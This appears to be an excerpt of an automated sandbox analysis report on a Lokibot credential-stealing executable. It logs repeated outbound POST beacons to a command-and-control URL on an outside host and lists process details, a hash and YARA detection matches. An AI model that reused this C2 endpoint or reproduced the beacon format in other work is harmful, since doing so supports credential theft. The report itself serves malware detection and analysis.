                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          69192.168.2.449840203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:33.411950111 CET6252OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:34.116691113 CET6252INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:33 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          7192.168.2.449754203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:12.128792048 CET1543OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:12.833798885 CET1544INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:12 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          70192.168.2.449841203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:34.725025892 CET6253OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:35.450486898 CET6254INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:35 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          71192.168.2.449842203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:36.028479099 CET6255OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:36.741519928 CET6255INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:36 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          72192.168.2.449843203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:37.334441900 CET6256OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:38.034826040 CET6257INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:37 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          73192.168.2.449844203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:38.623261929 CET6258OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:39.339082003 CET6258INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:39 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          74192.168.2.449845203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:39.953346014 CET6259OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:40.683614016 CET6260INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:40 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          75192.168.2.449846203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          76192.168.2.449847203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          77192.168.2.449848203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          78192.168.2.449849203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          79192.168.2.449850203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          8192.168.2.449755203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:13.445902109 CET1545OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:14.146862984 CET1545INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:14 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          80192.168.2.449851203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          81192.168.2.449852203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          82192.168.2.449853203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          83192.168.2.449854203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          84192.168.2.449855203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          85192.168.2.449856203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          86192.168.2.449857203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          87192.168.2.449858203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          9192.168.2.449756203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:14.755155087 CET1546OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:15.458630085 CET1547INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:15 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Code Manipulations

                                          Statistics

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Start time:19:12:51
                                          Start date:22/02/2021
                                          Path:C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\Conan Fegan - Aluminium.exe'
                                          Imagebase:0x960000
                                          File size:398848 bytes
                                          MD5 hash:708EE64939578FBB07010E20F6C7672C
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          General

                                          Start time:19:12:59
                                          Start date:22/02/2021
                                          Path:C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Imagebase:0xc20000
                                          File size:398848 bytes
                                          MD5 hash:708EE64939578FBB07010E20F6C7672C
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000005.00000002.901084712.000000000121A000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          Disassembly

                                          Code Analysis

                                          Reset < >